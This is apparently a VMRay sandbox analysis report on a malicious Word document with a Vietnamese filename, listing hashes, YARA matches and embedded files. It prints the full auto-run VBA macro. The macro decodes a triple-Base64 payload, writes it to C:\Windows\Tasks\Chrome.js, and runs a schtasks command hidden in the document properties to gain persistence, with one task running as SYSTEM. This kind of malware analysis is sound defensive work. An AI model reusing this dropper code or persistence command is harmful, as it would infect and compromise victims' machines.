b22d7b19...e617 | Files
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: -

b22d7b196ca03b43f9b140732a3d317f328e5d5f53379c2520a0f05a17d6e617 (SHA256)

CV gui PVN vv y kien cua UB ve gia han.doc

Word Document

Created at 2019-01-08 12:39:00

...
Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc Sample File Word Document
Suspicious
...
»
Mime Type application/vnd.openxmlformats-officedocument.wordprocessingml.document
File Size 23.34 KB
MD5 f4e23cf5d4eb9068e7e3ba617cae9088 Copy to Clipboard
SHA1 3b55440f396b9c688c1724181e1780098c95bddc Copy to Clipboard
SHA256 b22d7b196ca03b43f9b140732a3d317f328e5d5f53379c2520a0f05a17d6e617 Copy to Clipboard
SSDeep 384:/imtTYZvzQagj1JYfXfosEOWJIJwMlH7lVqsLWqUoWCtqRK+A8yC2jBJv3:/L20dj1IPnEOtH7aqUzCtqRK+UCE33 Copy to Clipboard
Parser Error Remark Static analyzer was unable to completely parse the analyzed file
Office Information
»
Description cmd /c schtasks /create /sc MINUTE /tn "Chrome" /tr "C:\Windows\Tasks\Chrome.js" /mo 2 /F & schtasks /create /sc MINUTE /tn "Chrome" /tr "C:\Windows\Tasks\Chrome.js" /mo 2 /RU SYSTEM
Creator A
Last Modified By Win7
Revision 7
Create Time 2019-01-04 01:08:00+00:00
Modify Time 2019-01-08 15:02:00+00:00
Document Information
»
Application Microsoft Office Word
App Version 16.0000
Template Normal
Document Security SecurityFlag.NONE
Editing Time 18.0
Page Count 1
Line Count 10
Paragraph Count 2
Word Count 222
Character Count 1269
Chars With Spaces 1489
Heading Pairs Title
ScaleCrop False
SharedDoc False
VBA Macros (1)
»
Macro #1: ThisDocument
» 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function Base64Decode(B64 As String) As String
    On Error GoTo over
    Dim OutStr() As Byte, i As Long, j As Long
    Const B64_CHAR_DICT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
    If InStr(1, B64, "=") <> 0 Then B64 = Left(B64, InStr(1, B64, "=") - 1)
    Dim kk, length As Long, mods As Long
    mods = Len(B64) Mod 4
    length = Len(B64) - mods
    ReDim OutStr(length / 4 * 3 - 1 + Switch(mods = 0, 0, mods = 2, 1, mods = 3, 2))
    For i = 1 To length Step 4
        Dim buf(3) As Byte
        For j = 0 To 3
            buf(j) = InStr(1, B64_CHAR_DICT, Mid(B64, i + j, 1)) - 1
        Next
        OutStr((i - 1) / 4 * 3) = buf(0) * &H4 + (buf(1) And &H30) / &H10
        OutStr((i - 1) / 4 * 3 + 1) = (buf(1) And &HF) * &H10 + (buf(2) And &H3C) / &H4
        OutStr((i - 1) / 4 * 3 + 2) = (buf(2) And &H3) * &H40 + buf(3)
    Next
    If mods = 2 Then
        OutStr(length / 4 * 3) = (InStr(1, B64_CHAR_DICT, Mid(B64, length + 1, 1)) - 1) * &H4 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &H30) / 16
    ElseIf mods = 3 Then
        OutStr(length / 4 * 3) = (InStr(1, B64_CHAR_DICT, Mid(B64, length + 1, 1)) - 1) * &H4 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &H30) / 16
        OutStr(length / 4 * 3 + 1) = ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &HF) * &H10 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 3, 1)) - 1) And &H3C) / &H4
    End If
    For i = 0 To UBound(OutStr)
        Base64Decode = Base64Decode & Chr(OutStr(i))
    Next i
over:
End Function

Private Sub Document_Open()
    Dim strBs0 As String
    Dim strBs1 As String
    Dim strBs2 As String
    Dim strBs3 As String
    strBs0 = "WkcxR2VVbEhUVGxLTWs1SVQxUk9ZVmRGY0RaWlZXUlhZekpLUkZGWVVtbGlWR3d6VTFWTmVHSkhWa2hXYlhCS1VqQnZNVmt3WkVkbGJVNDFVVmhTV21WVlJuQlRhMmhLVDFaam" & _
            "VGUnFWbXBOTVVweldXeE5NVlF4Y0ZsVldGWlhUV3hhY0ZaWE1WZGxSMUpZVm01d2ExSnFRVEpVTW5SUFpWWndXRkpxUW1GVk1tUjFXVlZvVTAxSFRrVmlNMXBOWld0VmVGUnJUV" & _
            "EJsUlRWd1RraHdUMlZVVWpSVVYzQktaR3hKZVU5WVdtRk5ibWh6Vm14b1EyRXhiRmxWYlhoTlRWWmFNMWRyWkVkTlJuQlVUbGhrYUZORlJuVlRNVko2V2pCd1NWTnRlR3BOTUVV" & _
            "MVUydG9TbVJXU1hsV2FrSldZbFphTmxrd1l6VmtWMDE1VmxjNVRGWklUbkpaTWpGWFpXMU9TVlJxUW1waVZscHZXV3hSZDJFeVRuUldibkJxVVhwV1NWZHNhRk5WTVhCWlZHNWt" & _
            "hVTFxVmpaWGJGcFBUVWRPZEZadGFHbFZNbVIzVkROc1FtRXlUWHBUVkd4cFlsWlplbFJHWXpWaFYwWjBWbTF3YTFFd1NsVmFWbWhQVFVad1dFMUlWbFJXVkdneFZsUk9VMlZXY0" & _
            "ZoU2JsSldZbFphYjFkclpGZGxWV3hFVlc1c1lWZEZOVE5aZWs1VFpWWndXRkp1VWxCbFZVWnlWVlJKZUdFeFFsUlZibkJxWVZSV1ZGZHNaRWRoTVZwSVQxVmFhV0pXUm5aVE1WS" & _
            "jZZVEZGZVUxWGRGRldibEpWV2xab1QwMUdjRmhOU0ZaWFVqRlpNRnBGVFRGU2JVcDBWRzVhWVZJeWVERlhha1YzVG1zNWMxWnNWbE5oYldReFZXcEtWMDFHVlhwVmJteG9WbnBX" & _
            "ZFZNd1dqQldSMVpaVkdwQ1lWWjZRakZWVkVrMVpGZFNkRlp1Ykd0U2FrRXlWREowWVdWWFNYbE5WVTVhVjBVMWMxUnRjRk5XUjFKSlUyNUNhV0pYVG5aVGExWlBaRVp3UkdFelF" & _
            "sQmxWVVp5VjFSSmVHRXhVWHBXYWtKUlZsZDRNVnBITURWamJIQlVUVlZhYkZORlNqVlhiR2hQWlcxR1dFOVlWa3BSZWtaRldXcEplR1JHYkZoT1YzUlFZVlpLUlZsc1pGTlBSbE" & _
            "Y2Vm1wQ1RWWnJOSGRaTWpGelpGWndObU15ZEZaaVZscEZXV3hrVWs5V1kzZFVibHBwWW14d2Mxa3lOVk5hUlRseFkwWldhVTFGY0c5WmVrcFdUV3MxUjFScVFtcGlWM2d4VjI1c" & _
            "2IxbHNWWHBpU0hCclVqRmFNRlJIZUZOaVIxWkpWVmhXVTFaNlZuRlpha3BUWTBkS2RGcEhVbEJoYmtKWFZtdFdXazVGZUhKYVIzaHJVbFZ2TVZwRlpGZGxhM1JFVlcxd2FWWXhT" & _
            "bEZhUm1oU1kwVjBWV015ZEd0WFJscDNWMnRSZUZOdFNuVlhibHBvVFd4V01GVnNhRzlrTWs1MFZtNXdhazF0ZURKWmJXeENaRVpGZVU5WVVtbFdNRm94VjJ0U2RtSnRVWGxOV0V" & _
            "KYVpWVktjVmw2VGtObFYwbDVWV3BHV2sweFJtNVhha3BYVFVWc1NWWnFSbWhXTVVaMVdtdFZOVTFYVWtSTlZsSnJVMFZ3ZDFsdE1XcE9NSEJIVTIxNGExWXllSEpWUmxvd1VrZE" & _
            "plVTVVU21GWFJXOTNWMFpTZGs1c1draFBWVTVhVjBVMWMxUnRjRk5XUjFKSlUyNUNhV0pYVG5aV2VrWlBUbGROZWxWdGVHbFZlbFpXVjJ4b2IwMUZlSEpXYmxaYVRXcHNjbGxXW" & _
            "XpGaWJHaFZZbnBhVjFac1NraFVNRTB4VTBad1dWVnJUbXhYUmtweldUTnNibUV5VWxsV2JrSmhVVEowZDFRemJGTlZWMUpaVkc1T1VWVXdSblZaVldoVFRVZE9SV0l6V2sxbGEx" & _
            "VjRWR3ROTUdWRk5YQk9TSEJQWlZSU05GUlhjRXBrYkVsNVQxaGFZVTF1YUhOV2JHaERZVEZzV1ZWdGVFMU5SMUl5V1dwS2EyTXhjRlJPV0dSb1UwVkZkbFpHWkVkaGJFSlVXWHB" & _
            "rUzFKclNYaFpla296VDFWd1IxRnFSbXBOYm1SNVUydGFTMkpIVWxoaVIzUlFaVlpLVWxwR2FFOWpNVUpVVld4R2ExZEZOWHBUTTJ4cVRERktTRkpxUWxwV1JFSjFWRE5zVTFWWF" & _
            "VsbFViazVSVlRGS1VscEdhRTlqTUhRMVZXeE9ZVlpWTlRCWGExSXdXV3hWZW1KSWNHdFNNVm93VkVkek1XSkhVa1JPVm1oaFZqQndWRmRzYUVkTlZuQlpWR3BDV1ZVeFNYcFhiR" & _
            "1JMVlRGd1dWSnFSbUZYUlRSM1ZVWmFNRlpIVmxsVWFrSmhWbnBDTVZaSE1WZE5SWGh6V2tkNFdtSkZjSE5aTVdoWFlrZE5lbFZ0VWxCaGJrSkZXVEl4VjJGSFVraFdWemxMVW10SmVGbDZTak5qUlRrMVZXcE9ZVll3Y0ZSWGJHaEhUVlp3V1ZScVFrMWhla1p6V2tWa2IyUnNjRVZOUnpWV1VsUnNWVlpyVG1wT01IQkpXa2Q0V21KRmNITlpNV2hYWWtkTmVsVll" & _
            "WbE5OYkZsM1ZsY3hWMlZ0VGtoUFdGWnFUV3hXZGxNeFVucGhWVGt6VUZRd2JrOTNjRVZSYWxrd1NVUXdaMXB1Vm5WWk0xSndZakkwYjJONWEyZGxkMjluU1VOQloyUnRSbmxKUjFVNVpUTXdjMkZUZUdsUVZFRnpXWGw0TkV4SGR6bE5RM2hvVEVoSk9VcDVZM05rZWpGVVpFaEtjR0p0WTNWYWJrcDJZbFZPYjFsWVNrUmlNbEpzVEVWM09XTjVOWE5hVnpWdVpFZ" & _
            "G5OME5wUVdkSlEwSXlXVmhKWjFGVU1HbFJWVXBFVWtWV1IxSXdhRXBUYTNSTlZGVTFVRlZHUmxOVk1WSldWbXhrV1ZkV2NHaFpiVTVyV2xkYWJtRkhiSEZoTW5oMFltMDVkMk5ZU25wa1NGWXlaRE5vTldWcVFYaE5hazB3VGxSWk0wOUVhM0pNZVVrM1EybEJaMGxEUW0xaU0wbHZZVlF3ZDA4eWF6aE9hbEUzWVZOemNrdFlkR3hYTUVWMVdUSm9hR05yUmpCTFI" & _
            "ydHdXRlF4Y0U4ek1FdEpRMEZuU1VkYWRtTnBhRFJRVkVFM1pVUjRUVTh6WjNKTGVXdzNRMmxCWjBsRFFXZEpRMEZuV1hveGJGY3pUWFZaTW1ob1kydEdNRXRJWjNCWVZIUnBVRk5vYVZCRWR6SkxVM1JxVHpKM2NsQlVXVGREYVVGblNVTkJaMGxEUVdka01taHdZa2RWYjJKRU5EbFBRMnczUzBOb2FGQlRhR2xRYWpRclMwZDNkRkJVWjNCTFUxbDNaVWRhYlV0W" & _
            "WVEaExTR2M0UzBWM2RFMXBhM0JMVTFsdFMwaEpjbEJZWTI5WlUydHdUek13UzBsRFFXZEpTREJMU1VOQlowbElTbXhrU0ZaNVltbENlVTkzY0RsUGQzQXlXVmhKWjJJeVNuRlZNbWhzWWtkM09XSnRWak5KUlVacVpFZHNNbHBXYUZCWmJYQnNXVE5SYjBsc1pGUlpNMHB3WTBoUmRWVXlhR3hpUjNkcFMxUnpTMlJ0Um5sSlIyeFRXbGhTTVdOdE5VUmlNbEpzVUZ" & _
            "jNWFXRnNUbTlhVjNoelRHeEtNV0pwYUVWUmFsa3dTMGROY0V4RVFYTmFiVVp6WXpKVmNFOTNQVDA9"
    strBs1 = Base64Decode(strBs0)
    strBs2 = Base64Decode(strBs1)
    strBs3 = Base64Decode(strBs2)
    Debug.Print strBs3
    
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim Fileout As Object
    Set Fileout = fso.CreateTextFile("C:\Windows\Tasks\Chrome.js", True, True)
    Fileout.Write strBs3
    Fileout.Close
    
    Dim dp As DocumentProperty
    For Each dp In ActiveDocument.BuiltInDocumentProperties
    If dp.Name = "Comments" Then
    Shell (dp.Value)
    End If
Next
End Sub
YARA Matches
»
Rule Name Rule Description Classification Severity Actions
VBA_Create_File VBA macro contains file creation commands; possible dropper -
3/5
...
VBA_Create_File VBA macro contains file creation commands; possible dropper -
3/5
...
49d2bc305daf1fcca84d6a282e52d1dfd2d79e9ca9f96a3a435d058ae2d8f755 Embedded File XML
Whitelisted
...
»
Parent File C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc
Mime Type application/xml
File Size 0.92 KB
MD5 87194dbc6219667d2f15d48641cb9b25 Copy to Clipboard
SHA1 b8950e9aaf341313ac570d6082b7b80271568ab2 Copy to Clipboard
SHA256 49d2bc305daf1fcca84d6a282e52d1dfd2d79e9ca9f96a3a435d058ae2d8f755 Copy to Clipboard
SSDeep 24:2dtWa6ffa7b6flYR7a6flYIO7V4+Q0HpQ7u6flYq7o26flY6J67Q6flYKJ:c01naX6NYRG6NYVh7Q0HpQS6NYqN6NY/ Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2013-04-24 20:22 (UTC+2)
Last Seen 2018-08-16 17:44 (UTC+2)
c97833e6456aa2bfe9be614f9c3ae41a8ef764b1cc3af92c6a6f273c62309122 Embedded File XML
Whitelisted
...
»
Parent File C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc
Mime Type application/xml
File Size 0.27 KB
MD5 dd79e6440b0515bfcf771c2c5286a2c8 Copy to Clipboard
SHA1 40dc1e00e2663cb33f8c296cdb0cd52fa07a87b6 Copy to Clipboard
SHA256 c97833e6456aa2bfe9be614f9c3ae41a8ef764b1cc3af92c6a6f273c62309122 Copy to Clipboard
SSDeep 6:TMVBd6OjzmC3mUifmReUdzXxjmUA+DYQXzReYX9v48sEJ:TMHdtWa6fmEUdzXV4+DYQDEEQWJ Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2012-11-16 07:03 (UTC+1)
Last Seen 2019-01-06 12:21 (UTC+1)
C:\Windows\Tasks\Chrome.js Created File Text
Unknown
...
»
Mime Type text/plain
File Size 3.17 KB
MD5 c98b305f90a412362e54fd297afb3674 Copy to Clipboard
SHA1 4705c1151fe5db668f2a3e9f84d78bf63a018555 Copy to Clipboard
SHA256 31467c1f93ba3f47e5343d5c4b3899533d3270bee868831016b8c4aee3e6cc6f Copy to Clipboard
SSDeep 48:XPlZP0/tdyoNWbdmjpQ11gC9WlB4lLdyTlpL+JKyfNayAT7W1nM7jlcqKJqmTdzq:XPySoQUjpQ1Uam7wKyf8Z/EwjRadu Copy to Clipboard
5312661b9e1d78deefa38ba96b6ffa090d005472235ff083b54dde9d73a56276 Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc
Mime Type text/plain
File Size 2.82 KB
MD5 9a30f764affd2f9a589fbf2670d43f14 Copy to Clipboard
SHA1 22523d62a4974dd3752e10ee59bad6baba1652a0 Copy to Clipboard
SHA256 5312661b9e1d78deefa38ba96b6ffa090d005472235ff083b54dde9d73a56276 Copy to Clipboard
SSDeep 48:SsNtQZdebdnl0TlWsG/k1p1GC1lqt70H27fjhpF/kalgm0gAUg+2TOFD/YGekQEi:dNtQZdqhl0pyqGa4oWLjhUalgmIwqOJa Copy to Clipboard
52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc Embedded File Unknown
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc
Mime Type application/CDFV2-unknown
File Size 19.50 KB
MD5 c1daaca5741e9ced785d683a05216f7c Copy to Clipboard
SHA1 ec8deede59e81a841145333b66c3253c591c4142 Copy to Clipboard
SHA256 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc Copy to Clipboard
SSDeep 384:8tR/+qmHdHhpwiZ2Dw/vVT1x+Gwmoq18PAY0jm5Xd:aadEiZaABx+pqqPxh5Xd Copy to Clipboard
b6a2282545ac0eac69c91f9092d9109c993527d1f0e03b0457acc5721fe12175 Embedded File XML
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc
Mime Type application/xml
File Size 6.00 KB
MD5 bc1dc70defcb712cedde2fc2c491e537 Copy to Clipboard
SHA1 52a9e73cca1e94543d95a37544377563e1f2ce1e Copy to Clipboard
SHA256 b6a2282545ac0eac69c91f9092d9109c993527d1f0e03b0457acc5721fe12175 Copy to Clipboard
SSDeep 96:vmWc6mmY+bzZliSwT/iZo0SXTbreegvIVpG5JMMPrWBmHgQ9lys0ujRVVvkXyH7Z:XxmmY+Zsy4EO0R7J Copy to Clipboard
81d22ccf51ee4c30533dd16600b90ae1b17310ec88d17348eccba08cdb4528eb Embedded File XML
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\CV gui PVN vv y kien cua UB ve gia han.doc
Mime Type application/xml
File Size 2.53 KB
MD5 5dbb2ecb942432e9ac1b6b7b9dafd595 Copy to Clipboard
SHA1 8703bcaedb7a87453949a2be32f73e27f33bc59a Copy to Clipboard
SHA256 81d22ccf51ee4c30533dd16600b90ae1b17310ec88d17348eccba08cdb4528eb Copy to Clipboard
SSDeep 48:ciec6mNYYNEbliS+B1+4+kXoM+YqM+IyM+wM+VdzlcAayVKggYTjvgD0:+c6mmY+bliSwTNXN9xbue8ggaF Copy to Clipboard
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image